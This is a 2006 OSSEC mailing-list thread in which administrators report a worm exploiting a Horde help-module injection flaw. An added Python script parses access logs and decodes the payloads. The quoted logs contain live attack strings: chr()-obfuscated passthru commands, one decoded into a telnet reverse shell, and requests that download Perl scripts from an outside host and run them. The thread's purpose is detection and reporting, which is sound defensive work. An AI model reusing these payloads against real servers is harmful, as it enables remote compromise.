[ossec-list] Re: Horde worm in the wild.
Hi Daniel,
Sorry for the late reply.
We have similar entries in our logs (there are not too many).
---
85.96.227.229 - - [13/Jun/2006:20:31:49 +0300] "GET
/horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98).chr(101).chr(103).chr(95).chr(59).chr(108).chr(115).chr(32).chr(45).chr(97).chr(108).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(101).chr(110).chr(100).chr(95));'.
HTTP/1.1" 302 568
85.96.227.229 - - [13/Jun/2006:20:49:11 +0300] "GET
/horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98).chr(101).chr(103).chr(95).chr(59).chr(115).chr(108).chr(101).chr(101).chr(112).chr(32).chr(55).chr(50).chr(48).chr(48).chr(124).chr(116).chr(101).chr(108).chr(110).chr(101).chr(116).chr(32).chr(49).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(55).chr(32).chr(52).chr(51).chr(50).chr(49).chr(124).chr(119).chr(104).chr(105).chr(108).chr(101).chr(32).chr(58).chr(32).chr(59).chr(32).chr(100).chr(111).chr(32).chr(115).chr(104).chr(32).chr(38).chr(38).chr(32).chr(98).chr(114).chr(101).chr(97).chr(107).chr(59).chr(32).chr(100).chr(111).chr(110).chr(101).chr(32).chr(50).chr(62).chr(38).chr(49).chr(124).chr(116).chr(101).chr(108).chr(110).chr(101).chr(116).chr(32).chr(49).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(55).chr(32).chr(52).chr(51).chr(50).chr(49).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr
(109).chr(100).chr(95).chr(101).chr(110).chr(100).chr(95));'.
HTTP/1.1" 302 1257
---
The first line is: passthru(echo _cmd_beg_;ls -al;echo _cmd_end_);
the second line is: passthru(echo _cmd_beg_;sleep 7200|telnet 10.0.0.7 4321|while : ;
do sh && break; done 2>&1|telnet 10.0.0.7 4321;echo _cmd_end_);
Regards,
Ahmet Ozturk.
Daniel Cid wrote:
> Is anyone noticing a new horde worm out there? It is related to the
> following vulnerability (http://www.horde.org):
>
> "
> March 28th, 2006. The Horde Team has released a critical security fix
> for the Horde Application Framework versions 3.0 and above. Version
> 2.x and earlier releases are not affected. The fixed Horde versions
> 3.0.10 and 3.1.1 are available. We strongly encourage every user to
> update to the new versions immediately.
>
> There are exploits in the wild for this vulnerability. They can only
> exploit the user the webserver runs as, but are still serious. Please
> upgrade now.
> "
>
> I'm getting alerts from ossec for the following logs (yes, my horde is
> updated :)).
> Is anyone seeing that?
>
>
> 217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET
> /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
> HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"
>
> 204.14.90.21 - - [20/Jun/2006:19:00:34 -0300] "GET
> /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
> HTTP/1.0" 200 37974 "-" "lwp-trivial/1.41"
>
> 204.14.90.21 - - [19/Jun/2006:03:07:23 -0300] "GET
> /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
> HTTP/1.0" 200 37917 "-" "lwp-trivial/1.41"
>
> 69.16.208.123 - - [18/Jun/2006:11:15:13 -0300] "GET
> /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
> HTTP/1.0" 200 37926 "-" "lwp-trivial/1.41"
>
>
> Thanks,
>
> --
> Daniel B. Cid
> dcid @ ( at ) ossec.net
>
>
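A small detector for the request shape discussed in this thread, added here as an example (it is not part of either post and not OSSEC code): it pulls the `module` parameter out of Apache access-log lines, URL-decodes it, and evaluates the `chr()`/string-literal concatenation that follows a `passthru()`-style call so the injected command can be read in clear, the way the two posters decoded theirs by hand. The log lines, IPs and host names in `SAMPLE_LOG` are constructed placeholders, not the ones from the thread.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines modelled on the two payload shapes quoted in the
# thread (pure chr() concatenation; string literals joined with chr(47)), plus one
# benign request. Addresses and host names are placeholders.
SAMPLE_LOG = r'''
85.96.227.229 - - [13/Jun/2006:20:31:49 +0300] "GET /horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95));'. HTTP/1.1" 302 568
217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20dropper.example%22.chr(47).%22xx.txt%22); HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"
192.0.2.10 - - [20/Jun/2006:13:41:23 -0300] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
'''

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
MODULE_RE = re.compile(r'[?&]module=([^&]*)')
EXEC_RE = re.compile(r'\b(passthru|system|exec|shell_exec)\s*\(', re.I)
# Pieces of a PHP concatenation expression: chr(N) calls and double-quoted literals.
TOKEN_RE = re.compile(r'chr\((\d+)\)|"((?:[^"\\]|\\.)*)"')

def decode_php_concat(expr):
    """Evaluate the chr()/literal concatenation that follows the exec call."""
    out = []
    for m in TOKEN_RE.finditer(expr):
        if m.group(1) is not None:
            out.append(chr(int(m.group(1)) % 256))  # PHP chr() wraps modulo 256
        else:
            out.append(m.group(2).replace('\\"', '"'))
    return ''.join(out)

def analyze_line(line):
    """Return a finding for a Horde help/?module= injection attempt, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, path = m.group(1), m.group(2)
    q = MODULE_RE.search(path)
    if not q:
        return None
    module = unquote(q.group(1))          # payloads may arrive %-encoded or raw
    call = EXEC_RE.search(module)
    if not call:
        return None
    return {'ip': ip, 'function': call.group(1).lower(),
            'command': decode_php_concat(module[call.end():])}

def scan(log_text):
    """Run analyze_line over every line and keep only the hits."""
    return [f for f in (analyze_line(l) for l in log_text.strip().splitlines()) if f]
```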
OSSEC project: www.ossec.net.
Mailing list information: http://www.ossec.net/en/mailing_lists.html.